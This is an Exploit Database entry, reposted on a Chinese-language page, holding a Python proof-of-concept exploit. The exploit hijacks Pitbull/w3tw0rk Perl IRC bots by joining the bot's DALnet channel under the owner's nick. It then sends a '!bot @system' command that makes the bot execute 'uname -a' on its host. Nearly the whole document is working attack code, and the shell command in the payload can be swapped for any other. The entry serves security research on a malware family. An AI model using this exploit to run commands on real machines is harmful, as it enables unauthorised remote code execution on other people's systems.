w3tw0rk / Pitbull Perl IRC Bot – Remote Code Execution

• Exploit Database
• 16 阅读

• 作者： Jay Turla
  日期： 2015-04-06
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/36652/

• # thehunter.py
  # Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution
  # Author: Jay Turla ( @shipcod3 )
  # Description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.
  
  import socket
  import sys
  
  def usage():
   print("USAGE: python thehunter.py nick \n")
   
  def main(argv):
  
  if len(argv) < 2:
  return usage()
  
  #irc server connection settings
  botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot
  server = "us.dal.net" #irc server
  channel = "#buhaypirata" #channel where the bot is located
  
  irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
  print "connecting to:"+server
  irc.connect((server, 6667)) #connects to the server
  irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication
  irc.send("NICK "+ botnick +"\n") #sets nick
  irc.send("JOIN "+ channel +"\n") #join the chan
  irc.send("PRIVMSG "+channel+" :!bot @system 'uname -a' \n") #send the payload to the bot
  
  while 1:#puts it in a loop
  text=irc.recv(2040)#receive the text
  print text #print text to console
  
  if text.find('PING') != -1:#check if 'PING' is found
  irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!)
  if text.find('!quit') != -1: #quit the Bot
  irc.send ("QUIT\r\n") 
  sys.exit()
  if text.find('Linux') != -1: 
  irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
  irc.send ("QUIT\r\n")
  sys.exit()
  
  if __name__ == "__main__":
  main(sys.argv)